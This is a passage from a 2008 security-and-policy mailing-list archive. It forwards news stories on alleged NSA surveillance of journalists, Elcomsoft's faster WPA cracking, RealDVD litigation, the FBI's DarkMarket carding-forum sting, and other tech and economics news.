screen. Although the system allowed them to block phone numbers identified as belonging to a nongovernmental organization or journalist, they never did so. Instead, she said, they added the numbers of humanitarian aid organizations and journalists to a priority list. "They were 'priority five,' from what I remember," she said. "'Priority one' was terrorist organizations. 'Priority five' is middle of the road. 'Priority nine' was just unidentified numbers. Not only were we given the ability to listen to [NGOs and journalists], but it was programmed into our system to listen to them." Periodically, they received a list of new numbers that had been programmed into the system. "I don't know where the numbers were coming from," Kinne said. "We were just given raw materials and we had to identify what number belonged to what organization and prioritize and set up a list." They wrote a report on each call, except those made to parties in the U.S. Kinne said they were just instructed to listen to those calls. She later said in another conversation that some people in her group did write reports involving conversations of Americans and Australians, but didn't reference the nationality of the speaker in their report. "Americans 'in-country' were fair game as long as you didn't identify them as American," she said. "People wrote reports on what journalists said all the time." Kinne's recollections of intercepted calls were vague on details, as one might expect of someone recalling four-year-old conversations that held no significance at the time. She was generally unable, for example, to recall the names of people whose calls were intercepted or the names of specific media outlets to which the monitored journalists belonged. The few she did remember stood out in her mind because of the nature of the calls or circumstances surrounding them. For example, Kinne was reprimanded for listening to one call when she should have been focused on a fax that her unit intercepted purporting to identify the location of weapons of mass destruction in Iraq. The fax arrived in the middle of the night, around the time of the Iraq invasion Kinne was monitoring a call involving two English- speaking humanitarian aid workers who were in a vehicle frantically trying to reach their office to find cover before bombs began raining on the city. "I just remember they were ... calling in their position [to their colleagues] every 10 to 15 minutes or so because they were worried about their safety," she said. Kinne filed several reports about the aid workers and gave their location to her supervisor, believing that U.S. military personnel might help the aid workers, or at least refrain from shooting their vehicle. But while she was monitoring the workers, a fax arrived, several pages long and written in Arabic. Even though the fax was from a phone number with a higher priority, Kinne ignored it because she felt the lives of the aid workers were more important. When another worker later read the fax and realized its significance, all of the workers were instructed to drop everything to translate it. Kinne said the fax purported to describe the location of chemical, biological and other weapons of mass destruction in Iraq. As soon as her group completed the translation, she said it was sent to the White House -? the only time information was sent directly in this manner. After the information was on its way, Kinne looked at the source of the document and began to doubt its authenticity. She said it came from the Iraqi National Congress or Iraqi National Accord -- she couldn't remember which. Kinne said she expressed doubts to her commanding officer, John Berry, about the authenticity of the information and was told that her job was to collect the information, not analyze it. "He said I didn't care about our mission or our country ... and I needed to stop asking questions," she said. Kinne was written up in an incident report for having ignored the fax when it came in. When she later read news reports confirming that an Iraqi group had fed the military intelligence false information, she suspected the fax had been deliberately sent through an open satellite network so that her unit would intercept it and give it to the White House. The only other conversations Kinne recalled with any detail involved journalists staying at a hotel in Baghdad around the time of the U.S. invasion. The journalists revealed their location in calls to U.S. family members. Kinne said she'd been monitoring the conversations of journalists at the hotel for a while, when the name of the hotel appeared on a military list of targets for bombing. Kinne said she brought the information to Berry's attention. "I told him, you realize there are journalists staying in that hotel and we have just said that we are going to bomb it," she said. "I assumed that ... whoever made the targeting list didn't know journalists were staying there." She didn't know if the information was passed on to anyone, but in April 2003, a U.S. tank fired on the Palestine hotel, which was serving as a base for many journalists. Two journalists were killed. Two subsequent investigations by the army and the Committee to Protect Journalists concluded that the gunners had never been told journalists were at the hotel. Two fellow linguists who had worked with Kinne at Fort Gordon disputed Kinne's story of illegal surveillance. They asked to remain anonymous because they were violating orders to not discuss their work at Fort Gordon. Both linguists said they never violated USSID 18 and had never heard about a waiver, which one of them called implausible. They said USSID 18 was drummed into their heads and was posted everywhere at work as a constant reminder. "There is just no breaking that rule," one linguist said. "There are a lot of other rules they can change and have changed, but they don't change that one. We don't want to have a Watergate experience." The same linguist said if there had been any guidance from supervisors about violating USSID 18, it would have been along the lines of "if you hear something that meets this high criteria .. and there are words that are scaring you, tip it off to the head chief and they will decide if there is imminent risk. That is the only way we deviate ... So if [Kinne's] understanding is that all the rules got tossed, there is no way [that happened]." The other linguist was just as emphatic. "[N]ever in my entire military career have I ever been told that it was okay to listen to U.S. citizens. [If] an intercept came in that had a citizen's conversation, I was never told I could report what came from Americans." They were both angry with Kinne for discussing their work. One said if Kinne thought their mission had been illegal, she should have gone through internal processes or reported it to the FBI. "If there was something going on, she had methods to handle it. To go outside and do it in this way indicates a need to make it fantastical. Or to get back at somebody." The other translator noted that Kinne had conflicts with a number of people she worked with -- particularly her supervisor Berry -- and had a negative view of their team and its mission, which may have affected her perception of the operation. They described Berry as a problematic and hostile manager who didn't seem to know what he was doing. Adding to this was a pervasive sense of confusion around their mission, which was set up quickly on the fly and being run by reservists who had no experience intercepting phone calls. The unit was overworked, understaffed and undertrained. They didn't have a standard of operation, or SOP, when they started the mission and had to cobble one together from other SOPs. Many conversations they had to translate were in dialects unfamiliar to them or languages, such as Pashtu, in which they had no proficiency. In that confusion, there might have been times when people inadvertently listened to conversations they shouldn't have, but both linguists said the policy was clear that they were not to listen or report on U.S. citizens or allies. "There was a lot of crazy stupidity going on, but [Berry] wasn't abusing USSID 18 because he didn't have the authority," one said. The other linguist said, "[T]he entire way of using intelligence and the dissemination of information ... were changing, and as things were changing and we were trying to figure things out, I think there could have been a lot of gray lines that were walked instead of black and white." Asked for an example of these gray lines, the linguist explained: "[S]ometimes when you are searching for information ... things come across your way that are extraneous or not pertinent to what you should be doing, and if you come across that and you don't act on it, you don't report it, it's like it never happened. I can say there are times when that's possibly a gray area ... You hear a lot of things, you see a lot of things, but a lot of it is junk ... [and] some of it might be accidental. But the number one mandate [that] you are conscious of is, 'Is this something I should be listening to? Is this something I can report on?' If it doesn't meet those two criteria, you're going to discard it." It's worth noting that Kinne began speaking about her surveillance activities only after becoming an anti-war activist, and working with groups calling for the impeachment of President Bush. When Threat Level spoke with her last year, she was working as a research assistant for the Veterans Administration in Vermont and was becoming increasingly active politically. She had worked on get-out- the-vote campaigns for Moveon.org in November 2006, and in January 2007 began meeting with members of Iraq Veterans Against the War. She participated in a rally and a sit-in at the Vermont state house and went on a bus tour with anti-war activist Cindy Sheehan calling for the impeachment of President Bush. Kinne said that after the White House announced a troop escalation in Iraq, she became very angry that the 2006 mid-term elections and subsequent changes in Congress hadn't led to pressure on the Administration to pull out of Iraq. But it wasn't until details of the government's illegal domestic spying operation on Americans were revealed in late 2005, that she had reason to ponder her surveillance work, she said. Even then, her realization came slowly. "I never really thought about how what we did related to [those news reports]," she said. "It took me quite a while to put the pieces together. I just figured we were one mission, and I never thought that probably military intelligence groups across the country were all being given waivers to listen to whomever they wanted." It was another year and a half after the New York Times broke the story on the domestic surveillance program before Kinne uttered her first public words about the surveillance she had conducted on behalf of the NSA. "I still felt like it was all classified and I wasn't supposed to talk about it," she said. "But the more I got involved in things, the more I started getting really angry that people in government were not telling the truth and that people who know what's going on [are] not speaking out. The more I thought about it, the more I realized that I should tell people what I knew and hopefully that would encourage other people to say what they know." She said she just wanted to pass the information to others who could determine whether the army and administration broke the law. To that end, she had submitted her allegations to Sen. Patrick Leahy's office (D-Vermont) in the hope that his staff would look into the matter to determine if laws had been broken. Leahy's staff sent her an e-mail indicating that they sent her letter to the Department of Defense Inspector General. But Kinne never heard anything after that. Given her political activities and the delay in reporting the alleged abuse, the denials of her peers and the lack of corroborating evidence, Threat Level elected not to publish her claims last year. But in his upcoming book, The Shadow Factory, journalist James Bamford -- the leading civilian expert on the NSA -- reports that he confirmed the illegal surveillance with another linguist named David Murfee Faulk, who worked on the program through the Navy. One of Faulk's coworkers -- not Kinne -- asked a supervisor about USSID 18, and was ordered to disregard the directive, Bamford reports. James Dempsey, policy director of the Center for Democracy and Technology, said last year that if Kinne's information was accurate, it would be a significant advancement to what we knew about the administration's warrantless surveillance. "Up to now the administration has said that every single phone call that we intercepted we did so because we knew there was al-Qaida on the phone," Dempsey said. "Now you're saying that, at least overseas, they were targeting Americans when they had no reason to believe an al- Qaida member was on the other line. This is the first indication that the government was targeting not terrorists but Americans overseas on less than probable cause." From rforno at infowarrior.org Sat Oct 11 14:52:59 2008 From: rforno at infowarrior.org (Richard Forno) Date: Sat, 11 Oct 2008 10:52:59 -0400 Subject: [Infowarrior] - O'Reilly to new geeks: "get serious!" Message-ID: <98E76F67-3864-4746-9D2A-CFC5EF4BA3DC@infowarrior.org> http://www.latimes.com/business/printedition/la-fi-oreilly10-2008oct10,0,85246.story From the Los Angeles Times SILICON VALLEY Tech guru Tim O'Reilly challenges next generation to get serious The entrepreneur, investor and book publisher urges young entrepreneurs and engineers to stop making silly software and start making a real difference in the world. By Jessica Guynn Los Angeles Times Staff Writer October 10, 2008 SAN FRANCISCO ? Silicon Valley insiders call it the O'Reilly Radar: Tim O'Reilly's uncanny ability to spot a technology revolution before it happens. But lately the entrepreneur, investor and book publisher has been busier trying to incite the next one. He is urging young entrepreneurs and engineers to stop making some of the sillier software that lets Facebook users throw virtual sheep at their friends or download virtual beer on iPhones, and instead start making a real difference in the world. He says it's not just the right thing to do, but also the smart thing to do -- especially as the credit crunch spreads to Silicon Valley, venture financing becomes scarce and start-ups have to retrench. When this grizzled, 54-year-old tech-industry veteran talks, Silicon Valley tends to listen, if only to argue with him. After all, this is the guy who understood the power and significance of the Internet before most people were aware it existed. In 1992, he published "The Whole Internet User's Guide & Catalog," the first popular book about the medium, which was later selected by the New York Public Library as one of the most significant books of the 20th century. He now runs O'Reilly Media, an influential book publishing empire in Sebastopol, Calif., which has snagged a significant share of the computer book market with series such as "The Missing Manual" and "Hacks." Early this decade, O'Reilly helped coin the term "Web 2.0" to refer to the current phase of the Internet, which relies on collective intelligence and action from the bottom up (think social networks such as Facebook and photo-sharing sites such as Flickr). He is perhaps best known for putting on packed conferences headlined by some of the tech industry's brightest. Now he is using those conferences as a bully pulpit. The theme of his Web 2.0 conference here next month is "Web meets world." It will showcase activists such as former Vice President Al Gore, cyclist-philanthropist Lance Armstrong and Larry Brilliant, who, as head of Google.org, has reinvented philanthropy by setting up a foundation without tax-exempt status to invest in for-profit and nonprofit efforts. O'Reilly argues that Silicon Valley has strayed from the passion and idealism that fuel innovation to instead follow what he calls the "mad pursuit of the buck with stupider and stupider ideas." Flush with money and opportunity following the post-dot-com resurgence, he says, some entrepreneurs have cocooned in a "reality bubble," insulated from poverty, disease, global warming and other problems that are gripping the planet. He argues that they should follow the model of some of the world's most successful technology companies, including Google Inc. and Microsoft Corp., which sprang from their founders' efforts to "work on stuff that matters." Not everyone is convinced that business is the right vehicle to tackle social or environmental ills. But Jim Schorr, who lectures on social entrepreneurship at UC Berkeley's Haas School of Business, says he can't imagine "a higher calling for the next generation of tech entrepreneurs." "The opportunity to focus technology and tech entrepreneurs on the unaddressed, underserved segments of society is enormous," Schorr said. "Developing and extending technologies with limited profit potential, using market-driven approaches, can deliver both social and financial impact and sustainability." Though the Web 2.0 generation has a reputation for indulgence and narcissism, O'Reilly can point to a number of ventures using Silicon Valley ingenuity to deliver on Schorr's ideal. The Omidyar Network, created by EBay Inc. founder Pierre Omidyar and his wife, Pam, makes grants to and investments in worthy causes. Benentech.org, started by former rocket scientist Jim Fruchterman, creates software for human rights activists, environmentalists and people with disabilities. The Wildlife Conservation Network -- started by software engineer Charles Knowles, conservationist John Lukas and Akiko Yamazaki, wife of Yahoo Chief Executive Jerry Yang -- uses technology and a venture capital model to help save endangered species. A growing number of businesses are turning to social networking tools to encourage people to get more politically active and drum up donations for charities. Causes, started by Sean Parker and Joe Green, created the popular Causes application on Facebook and MySpace. Its 14.5 million users have created 110,000 campaigns. O'Reilly also singles out two other Web 2.0 stars for providing social benefit. Twitter, an instant digital communications service, has helped coordinate disaster response. YouTube, the video sharing website now owned by Google, has helped activists fight repressive regimes in other countries. "Simply providing technology that can be used for positive causes can have an enormous impact," he said. So how has O'Reilly's message gone over with the Web 2.0 crowd? "I've had a whole bunch of people tell me they were super-inspired," O'Reilly said. "I've had a few people act like I am raining on their parade." Michael Arrington, founder of the influential technology blog TechCrunch, says he appreciates the effort to get entrepreneurs and engineers to consider doing more, such as volunteering in schools to teach kids how to program computers. But he says O'Reilly's lament trivializes the good work done by Silicon Valley. "It's good to be aware that there are big problems out there that could be very profitable for companies to solve," Arrington said. "That doesn't mean that entrepreneurs who don't decide to tackle those problems aren't valuable to society." O'Reilly says he respects those contributions -- and makes a nice living showcasing them in his books and conferences. But, he says, "we have a tech generation that thinks that's all there is." "The real Web 2.0, the web of collective intelligence applications, is going to be stronger as a result of any downturn," he said. "Heck, figuring out more transparent financial markets alone will be a hotbed of opportunity." jessica.guynn at latimes.com From rforno at infowarrior.org Sun Oct 12 21:13:07 2008 From: rforno at infowarrior.org (Richard Forno) Date: Sun, 12 Oct 2008 17:13:07 -0400 Subject: [Infowarrior] - Elcomsoft gets 100x increase in WPA2 cracking speed Message-ID: <8A23E5CB-A67E-4AE0-9E52-70247CA2F471@infowarrior.org> Russian researchers achieve 100-fold increase in WPA2 cracking speed Oct.12, 2008 in Security http://securityandthe.net/2008/10/12/russian-researchers-achieve-100-fold-increase-in-wpa2-cracking-speed/ Russian security company Elcomsoft just posted a press release (original PDF) detailing a new method to crack WPA and WPA2 keys: With the latest version of Elcomsoft Distributed Password Recovery, it is now possible to crack WPA and WPA2 protection on Wi-Fi networks up to 100 times quicker with the use of massively parallel computational power of the newest NVIDIA chips. Elcomsoft Distributed Password Recovery only needs a few packets intercepted in order to perform the attack. The 100-fold increase in speed is achieved with two GeForct GTX280?s per workstation; for ?599 you can build a network of 20 workstations dedicated to ?recovering? your ?lost? WPA keys. This means that a WPA or WPA2 key could be cracked in days or weeks instead of years. This has prompted security firm GSS to advise their clients to add an additional layer of protection to their Wifi networks: ?This breakthrough in brute force decryption of Wi-Fi signals by Elcomsoft confirms our observations that firms can no longer rely on standards-based security to protect their data,? said GSS managing director David Hobson. ?As a result, we now advise clients using Wi-Fi in their offices to move on up to a VPN encryption system as well.? But the question remains how long it will take until the next generation of GPU?s or custom-designed chips will break VPN encryption as well. 3DES DES encryption can already be broken quite easily with custom-built machines, and while AES appears to be better on paper, there is no guarantee that there isn?t some hidden flaw in the algorithm. GSS agrees: Hobson added that the development could spur a step back from wireless to wired network connection in sensitive installation, such as financial services organisations, particularly concerned about data privacy. Update: This will, of course, mainly affect simple ascii keys. And it will only work against static keys; anyone using more complicated authentication schemes will not be at risk for now. But since that takes a couple of extra minutes when installing, smaller businesses or departments often skip setting this up. From rforno at infowarrior.org Mon Oct 13 11:31:37 2008 From: rforno at infowarrior.org (Richard Forno) Date: Mon, 13 Oct 2008 07:31:37 -0400 Subject: [Infowarrior] - Comic Wisdom from XKCD Message-ID: <26577CD5-FD01-47F4-BE70-86509BA779B7@infowarrior.org> Today's XKCD is a keeper and speaks wisdom beyond its simple stick- figure presentation. http://xkcd.com/488/ From rforno at infowarrior.org Mon Oct 13 13:28:59 2008 From: rforno at infowarrior.org (Richard Forno) Date: Mon, 13 Oct 2008 09:28:59 -0400 Subject: [Infowarrior] - YouTube adds full-length television shows Message-ID: <1A46B78E-C729-4EF9-852B-A213B29DA77A@infowarrior.org> YouTube adds full-length television shows By Michael W. Jones http://tech.blorge.com/Structure:%20/2008/10/12/youtube-adds-full-length-television-shows/ At a time when much of the television news revolves around the analog to digital change and reality television hijinks, YouTube has made some news of its own. The Google-owned video Web site has moved to put full-length television shows on its site for the first time. Historically, YouTube has hosted a bewildering and attractive variety of video clips, the vast majority of which have been less than ten minutes in length. YouTube announced on Friday that it had finalized a deal with CBS to offer shows such as Star Trek, MacGyver, Beverly Hills 90210, and The Young and the Restless. In some ways this new offering is more of a change in length and legality than an abrupt left turn. There have been small segments of television shows on YouTube almost since the beginning, but these also adhered more or less to the ten-minute time limit and were not sanctioned by the owners of the content. Often, such segments were removed after the copyright owner complained about their inclusion on the site. That will no longer be the case, at least for the content covered by the deal with CBS. YouTube also said that it was in negotiation with other providers of lengthier content, specifically mentioning other television networks. This announcement follows on the heels of the introduction of their TheaterView product, which is aimed at the provision of a higher quality online viewing experience. It is not too far a stretch of the imagination to assume that these two new services are somehow related. The new services also put YouTube head to head with Hulu, competing directly for the full-length television show viewer. Hulu currently has more of this sort of content than YouTube, but YouTube has the lion?s share of the Web video audience. It is estimated that YouTube has 100 times the viewers that Hulu has. With viewership being the key number in this marketplace, and with a business plan that now includes full-length television content, YouTube (and Google) are positioned to make a serious run at their competition. From rforno at infowarrior.org Mon Oct 13 13:33:16 2008 From: rforno at infowarrior.org (Richard Forno) Date: Mon, 13 Oct 2008 09:33:16 -0400 Subject: [Infowarrior] - Apple to 'ditch' Intel for Nvidia in standard MacBooks Message-ID: Apple to 'ditch' Intel for Nvidia in standard MacBooks http://www.theregister.co.uk/2008/10/13/apple_drop_intel_for_nvidia_rumour/ By Kelly Fiveash ? Get more from this author Posted in PCs & Chips, 13th October 2008 12:37 GMT Apple will drop Intel?s integrated graphics chipsets in its new family of MacBooks in favour of Nvidia?s new mobile platform, according to speculative reports. The company is expected to announce that decision tomorrow, AppleInsider reports. If the rumours are correct, the standard 13-inch machines will be loaded with chipsets from Nvidia?s MCP79 platform. Apple began shipping Intel-based x86 processors in its notebooks in 2006. The MCP79 platform, which is seen as a substitute for Intel?s Centrino 2 ?Montevina? system, supports the 1066MHz front side bus and has PCI Express 2.0 interfaces and optional DDR3 memory. Centrino 2 was finally released into the wild in July this year after a series of problems forced Chipzilla to delay the release of its refreshed platform. Apple boss Steve Jobs first told software developers in June 2005 of the company's decision to migrate from PowerPC to x86 processors, courtesy of Intel. Meanwhile, Apple on Friday said it will repair MacBook Pros where the Nvidia GPU has failed, or fails within two years from the purchase date. It also put the boot in to Nvidia after it confessed earlier this year to a higher than normal failure rate for some of the company's graphics processors due to a packaging defect. The chip maker claimed at the time that Apple's Mac computers were unaffected by the glitch. Apple has disagreed with that assessment. "After an Apple-led investigation, Apple has determined that some MacBook Pro computers with the NVIDIA GeForce 8600M GT graphics processor may be affected," said the firm in a statement on its website. "If the NVIDIA graphics processor in your MacBook Pro has failed, or fails within two years of the original date of purchase, a repair will be done free of charge, even if your MacBook Pro is out of warranty." Odd then, you might agree, that Apple could be considering Nvidia over Intel for its new line of MacBooks. We should know more tomorrow. ? From rforno at infowarrior.org Mon Oct 13 14:09:57 2008 From: rforno at infowarrior.org (Richard Forno) Date: Mon, 13 Oct 2008 10:09:57 -0400 Subject: [Infowarrior] - Congratulations to Paul Krugman Message-ID: October 13, 2008, 7:50 am Paul Krugman Wins Economics Nobel By Catherine Rampell http://economix.blogs.nytimes.com/2008/10/13/paul-krugman-wins-economics-nobel/?hp Paul Krugman, a professor at Princeton University and an Op-Ed columnist for The New York Times, was awarded the Nobel Memorial Prize in Economic Sciences on Monday. ?It?s been an extremely weird day, but weird in a positive way,? Mr. Krugman said in an interview on his way to a Washington meeting for the Group of Thirty, an international body from the public and private sectors that discusses international economics. He said he was mostly ?preoccupied with the hassles? of trying to make all his scheduled meetings today and answer a constantly-ringing cell phone. Mr. Krugman received the award for his work on international trade and economic geography. In particular, the prize committee lauded his work for ?having shown the effects of economies of scale on trade patterns and on the location of economic activity.? He has developed models that explain observed patterns of trade between countries, as well as what goods are produced where and why. Traditional trade theory assumes that countries are different and will exchange different kinds of goods with each other; Mr. Krugman?s theories have explained why worldwide trade is dominated by a few countries that are similar to each other, and why some countries might import the same kinds of goods that it exports. ?There was something very beautiful about the old existing trade theory, and its ability to capture the world in a surprisingly simple conceptual framework,? Mr. Krugman said. ?And then I realized that some of the new insights coming through in industrial organization could be applied to international trade.? Mr. Krugman wrote his dissertation, however, on international finance, and credits his late MIT professor Rudiger Dornbusch for pushing him to study international trade. ?I went to visit him one snowy day in early 1978 and described to him what I?d been thinking about,? Mr. Krugman said. ?He turned to me and said, ?You?ve got to write about that.?? Mr. Krugman has been an Op-Ed columnist at the New York Times since 1999. A collection of his recent columns can be found here. ?For economists, this is a validation but not news. We know what each other have been up to,? Mr. Krugman said. ?For readers of the column, maybe they will read a little more carefully when I?m being economistic, or maybe have a little more tolerance when I?m being boring.? He said that he does not expect his critics to let him off any easier because of his new accolade, though. ?I think we?ve learned this when we see Joe Stiglitz writing,? Mr. Krugman said, referring to the winner of the economics Nobel in 2001. ?I haven?t noticed him getting an easy time. People just say, ?Sure, he?s a great Nobel laureate and he?s very smart, but he still doesn?t know what he?s talking about in this situation.? I?m sure I?ll get the same thing.? In 1991 Mr. Krugman received the John Bates Clark medal, a prize given every two years to ?that economist under forty who is adjudged to have made a significant contribution to economic knowledge.? Mr. Krugman follows a number of Clark medal recipients who have gone on to win a Nobel, including Mr. Stiglitz. ?To be absolutely, totally honest I thought this day might come someday, but I was absolutely convinced it wasn?t going to be this day,? Mr. Krugman said. ?I know people who live their lives waiting for this call, and it?s not good for the soul. So I put it out of my mind and stopped thinking about it.? He said he didn?t actually know which day the winner?s name would be released until a colleague told him last week. Mr. Krugman continues to teach at Princeton. This semester Mr. Krugman is teaching a small graduate-level course on international monetary policy and theory, covering such timely subjects as international liquidity crises. In recent years he has also taught courses on the welfare state and international trade, as well as all-freshman seminars on various economic topics. Monday?s award is the last of the six prizes and is not one of the original Nobels, but was created in 1968 by the Swedish central bank in Alfred Nobel?s memory. Mr. Krugman was the only winner of the award, which includes a prize of about $1.4 million. From rforno at infowarrior.org Tue Oct 14 01:26:32 2008 From: rforno at infowarrior.org (Richard Forno) Date: Mon, 13 Oct 2008 21:26:32 -0400 Subject: [Infowarrior] - Bush Signs Law Creating Copyright Czar Message-ID: <864F165F-963F-412E-9839-17D14937A80B@infowarrior.org> Bush Signs Law Creating Copyright Czar By David Kravets EmailOctober 13, 2008 | 5:25:36 PMCategories: Intellectual Property President Bush on Monday signed into law legislation creating a copyright czar, a cabinet-level position on par with the nation's drug czar. Two weeks ago, the House sent the president the "Enforcement of Intellectual Property Rights Act" (.pdf), a measure the Senate approved days before creating a cabinet-level copyright czar charged with implementing a nationwide plan to combat piracy and "report directly to the president and Congress regarding domestic international intellectual property enforcement programs." The White House successfully lobbied the Senate to remove language tasking the Department of Justice with suing copyright and trademark infringers on behalf of Hollywood (.pdf), the recording industry, manufacturers and software makers. But the Bush administration also said it didn't want (.pdf) a copyright czar, a position on par with the nation's drug czar Congress created in 1982 to wage the war on drugs. Lawmakers, however, sent him the package anyway and the president signed. The czar is not likely to be appointed until after the elections. http://blog.wired.com/27bstroke6/2008/10/bush-signs-law.html From rforno at infowarrior.org Tue Oct 14 01:27:56 2008 From: rforno at infowarrior.org (Richard Forno) Date: Mon, 13 Oct 2008 21:27:56 -0400 Subject: [Infowarrior] - Why Hollywood Hates RealDVD Message-ID: <964E9D10-B21D-4BD0-8017-E663A4A90DF0@infowarrior.org> October 10th, 2008 Why Hollywood Hates RealDVD Legal Analysis by Fred von Lohmann http://www.eff.org/deeplinks/2008/10/why-hollywood-hates-realdvd Why does Hollywood hate RealDVD so much? Here's a hint: it has nothing to do with piracy and everything to do with controlling innovation. Earlier this week, a district court in San Francisco extended the temporary restraining order (TRO) blocking RealNetworks' distribution of its RealDVD software, at least until a full-dress preliminary injunction hearing can be held sometime in late November. Although reporters have done a good job reporting on the hearing, they have not answered a more basic question: why does Hollywood care so much about RealDVD in the first place? It's not about piracy. After all, those who want to copy DVDs have plenty of free, widely available, easy-to-use software to choose from (e.g., Handbrake, DVD Shrink, Mac The Ripper). And those who want to skip the tedium of DVD ripping altogether can easily download movies from unauthorized sources like The Pirate Bay. In short, Hollywood can't possibly believe that the $30, DRM-hobbled RealDVD software represents a piracy threat in an environment rife with easier options. So why unleash all the expensive lawyers to kill RealDVD? Answer: to send a message about what happens to those who innovate without permission in a post-DMCA world. As we've said for years, DRM systems like the Content Scramble System (CSS) used on DVDs are not principally about preventing piracy. Rather, DRM is the legal "hook" that forces technology companies to enter into license agreements before they build products that can play movies (Hollywood lawyers candidly admit this "hook IP" strategy). Those license agreements, in turn, define what the devices can and can't do, thereby protecting Hollywood business models from disruptive innovation. This arrangement reverses the previous innovation status quo. Where non-DRM'd content (e.g., books, broadcast TV, the CD) is concerned, innovators do not have to ask permission before building new products that can copy and play copyrighted works (e.g., the photocopier, the VCR, the iPod). But where DRM'd content like DVDs are concerned, Hollywood intended the DMCA's anti-circumvention provisions to slam the door on that kind of disruptive innovation. After the DMCA, technology vendors would have to ask permission, sign licenses, and make concessions, if they were going to build things to play DRM'd Hollywood movies. So it's not that Hollywood implacably hates personal use format- shifting and space-shifting -- rather, Hollywood wants to make sure those new features happen on Hollywood's terms ("pay us again"), on Hollywood's timetable ("later"), and only after valuable concessions have been wrung from technology companies ("watermark detection, compliance & robustness requirements, down-rezzing"). That's why RealDVD is such a threat. By reading the existing CSS license carefully, Real (and Kaleidescape before it) found a way to create a new product category without first getting permission from (and paying obeisance to) the Hollywood studios. Real's defection represents a threat to several schemes that Hollywood has been working on for throttling DVD innovation over the next several years. For example: * Managed Copy: Hollywood has been negotiating for years with technology companies over "Managed Copy," a mechanism that will allow limited copying of DVD and Bluray discs onto PCs and portable devices. "Managed Copy" has been promised for years, yet has not materialized, thanks to power struggles inside the organizations that run the relevant DRM licenses (DVD-CCA for DVDs, AACS-LA for Bluray). In the course of these negotiations, Hollywood has managed to wrest several important concessions from technology vendors (including requiring that computers do watermark detection to spot pirated copies when reading data from Bluray discs, and imposing DRM on resulting copies). If those technology companies can build things like RealDVD and Kaleidescape under the terms of the existing contract, then the prospect of more negotiations and concessions for Managed Copy suddenly seems much less appealing. * Digital Copy: Hollywood has begun selling DVDs that come with a second disc that permits the making of a copy on a PC. The catch? You have to pay extra for the right to make this personal use copy -- in other words, Hollywood is stealing your fair use rights and selling them back to you piecemeal. * Internet Download Services: you already bought it on DVD, but now Hollywood wants you to buy it a second time from iTunes, Amazon, or MovieLink if you want to watch the same movie on a PC or iPod. So that's the real story here. It's not about piracy. It's about Real defecting from the DRM licensing cartel, building what consumers want now instead of negotiating endlessly for a spot in Hollywood's next Five Year Plan for the DVD format. From rforno at infowarrior.org Tue Oct 14 11:35:47 2008 From: rforno at infowarrior.org (Richard Forno) Date: Tue, 14 Oct 2008 07:35:47 -0400 Subject: [Infowarrior] - Cybercrime Supersite 'DarkMarket' Was FBI Sting Message-ID: <78BA6D56-EE02-45C9-B8E2-6D04BE96290C@infowarrior.org> Cybercrime Supersite 'DarkMarket' Was FBI Sting, Documents Confirm By Kevin Poulsen EmailOctober 13, 2008 | 4:20:08 PMCategories: Crime http://blog.wired.com/27bstroke6/2008/10/darkmarket-post.html DarkMarket.ws, an online watering hole for thousands of identify thieves, hackers and credit card swindlers, has been secretly run by an FBI cybercrime agent for the last two years, until its voluntary shutdown earlier this month, according to documents unearthed by a German radio network. Reports from the German national police obtained by the S?dwestrundfunk, Southwest Germany public radio, blow the lid off the long running sting by revealing its role in nabbing a German credit card forger active on DarkMarket. The FBI agent is identified in the documents as J. Keith Mularski, a senior cybercrime agent based at the National Cyber Forensics Training Alliance in Pittsburgh, who ran the site under the hacker handle Master Splynter. The NCFTA is a non-profit information sharing alliance funded by financial firms, internet companies and the federal government. It's also home to a seven-agent FBI headquarters unit called the Cyber Initiative and Resource Fusion Unit, which evidently ran the DarkMarket sting. The FBI didn't return a phone call Monday. Like earlier crime sites, DarkMarket allowed buyers and sellers of stolen identities and credit card data to meet and do business in an entrepreneurial, peer-reviewed environment. Products for sale ran the gamut from specialized hardware, to electronic banking logins collected from phishing attacks, stolen personal data needed to assume a consumer's identity ("full infos") and credit card magstripe swipes ("dumps), which are used to produce counterfeit cards. Vendors were encouraged to submit their goods for review before offering them for sale. The unearthed documents, seen by Threat Level, show the FBI sting had begun by November, 2006. An FBI memo sent to the German national police regarding a forum member in that country boasts, "Currently, the FBI has been successful in penetrating the inner 'family' of the carding forum, DarkMarket." A March 2007 e-mail from Mularski's FBI address to his German counterpart puts it bluntly. "Master Splynter is me." The documents indicate the FBI used DarkMarket to build "intelligence briefs" on its members, complete with their internet IP addresses and details of their activities on the site. In at least some cases, the bureau matched the information with transaction records provided by the electronic currency service E-Gold. Last month, Master Splyntr -- now identified as Mularski -- announced he was shuttering the site as of October 4th, citing unwanted attention garnered by a fellow administrator, known as Cha0. From his home in Turkey, Cha0 had aggressively marketed a high-quality ATM skimmer and PIN pad that fraudsters could covertly affix to certain models of cash machines, capturing consumers account numbers and secret codes. But he began drawing heat this year after reportedly kidnapping and torturing a police informant. He was arrested in Turkey last month, where police identified him as one Cagatay Evyapan. That's why it was time to close DarkMarket, Master Splynter explained, in a message that now rings with irony. "It is apparent that this forum ? is attracting too much attention from a lot of the world services (agents of FBI, SS, and Interpol). I guess it was only time before this would happen. It is very unfortunate that we have come to this situation, because ... we have established DM as the premier English speaking forum for conducting business. Such is life. When you are on top, people try to bring you down." Darkmarket The German report confirm rumors that have swirled around DarkMarket since late 2006, when uber-hacker Max Ray Butler cracked the site's server and announced to the underground that he'd caught Master Splynter logging in from the NCFTA's office on the banks of the Monongahela River. Butler ran a site of his own, and the warning was generally dismissed as inter-forum rivalry, even when Butler was arrested in San Francisco last year on credit card fraud charges, and shipped to Pittsburgh for prosecution. Until this afternoon, SpamHaus listed Master Splynter as an Eastern European spammer named Pavel Kaminski, who was active as recently as 2005. It's possible the FBI took over the handle sometime thereafter. In 2004, the Secret Service ran a similar scheme on the crime board ShadowCrew, but that agency used an informant, who went on to commit more crimes -- a risk not likely present with agent Mularski. Lord Cyric, another former DarkMarket administrator, says Master Splynter was invited onto DarkMarket as an admin about two years ago, and was still known as a spammer. Based in Canada, Lord Cyric has sold fake IDs and checks in the underground, but he's convinced he's out of reach of any sting operation. "Worry? Me? Nah," he wrote in an IM interview. "It's a long, slow hard process for them to interest Canadian [law enforcement] to go after someone who doesn't touch drugs nor deals with skimmers. ... It's all about U.S. busts, unless there's a big drug deal and DEA gets involved." Threat Level admires Lord Cyric's bluster, but thinks his days in the underground are numbered. The FBI almost certainly closed DarkMarket in preparation for a global wave of arrests that will unfold in the next month or so. The site was likely shuttered to avoid an Agatha Christie scenario in which a diminishing pool of cybercrooks are free to speculate about why they're disappearing one-by-one like the hapless dinner guests in Ten Little Indians. Kudos 